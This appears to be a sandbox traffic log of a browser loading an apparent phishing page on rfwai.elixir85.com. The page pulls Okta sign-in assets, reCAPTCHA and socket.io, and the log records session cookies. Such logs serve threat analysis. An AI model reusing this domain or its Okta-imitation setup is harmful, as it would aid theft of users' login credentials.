          Source: global trafficHTTP traffic detected: GET /12C1tM2Y6lGcdYEVUZu6720 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /abjlZHFJHKoUOtpqyef30 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /pqC74CTJePSu4Ivyz37z7VePwx37 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /12uyZYHBH78nzrKfwqr47 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /90jodEH2Rir67QW4OuPst51 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /45JQQXGinJG902EgrDtnvQTvw65 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T190720Z&X-Amz-Expires=300&X-Amz-Signature=2954020ef3ae9b37bcd25c50a692a541af80978c55971e321c89a2f9def9fd71&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /89U0IUXkEak2DXQHKMqxZiF121VeznpNcbYfab72 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /efO4CTDXl0E5HViNkg78iFXDw85H8kkQKZmn98 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /345f8FXSJyBv6seEmEdklOXxG5e6FIs89107 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv220 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab228 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
